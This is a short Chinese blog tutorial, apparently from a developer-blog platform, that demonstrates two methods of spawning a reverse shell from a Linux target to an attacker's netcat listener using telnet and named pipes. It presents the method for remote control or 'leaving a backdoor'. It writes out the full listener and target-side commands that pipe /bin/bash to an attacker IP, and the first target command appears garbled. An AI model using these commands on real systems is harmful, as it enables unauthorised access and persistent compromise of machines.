windows反弹_利用telnet反弹shell的两种方法

9a5c61a1b505dbc51b06bb79fbab33b2.gif

今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。

前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windows、linux均可)。

这里我准备了一个公网服务器和一个本地虚拟机,公网服务器为攻击机,虚拟机为目标机。

攻击机:

49cbdb760ee921b95a2a8dae8b8d4ad3.png

目标机:

9cf80119e34a980eb48840925e4ae7be.png

下面给大家演示一下如何反弹shell:

第一种:

1. 攻击机先执行监听:nc -l 2222

c3875804b963f818fa85460d07a130fe.png

2. 目标机执行:mknod a p; telnet x.x.x.x 2222 0a  (x.x.x.x为攻击机ip)

83503444830775fcb7a57d26f1a4a811.png

3. 攻击机已经获得shell(没有提示),尝试执行命令:

1c2c48d3f5ee52958c2a49c84f8e4e30.png

第二种:

1. 攻击机需要开两个终端分别监听两个端口:nc -l 6666,nc -l 5555

a44e65902d280112773bf5697d500adc.png

2. 目标机执行:telnet x.x.x.x 6666 | /bin/bash | telnet x.x.x.x 5555 (x.x.x.x为攻击机ip)

8f77b8e7ec9387f705477c6611a025e9.png

3. 目标机已经获得shell,尝试执行命令(第一个终端执行命令会在第二个终端回显):

e6e6f9c272c6e7af7e60013ee0416270.png

这就是利用telnet反弹shell的两种方式,当然也不仅有这两种,网上可以找到其他各种反弹的方式,不过原理都差不多。

本次演示使用的两个系统都是centos7,且近乎初始化的系统,演示是截图这种效果。根据操作系统不同,有的系统获取到shell或者被目标机telnet连接时是会有回显的。

2003b74746e66aac732162091bb360f5.png

你可能喜欢

不知道密码的情况下hacking mysql并反弹shell

zabbix反弹shell并拿下系统root权限

2d54386e4a17d0648d37875aeff29363.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值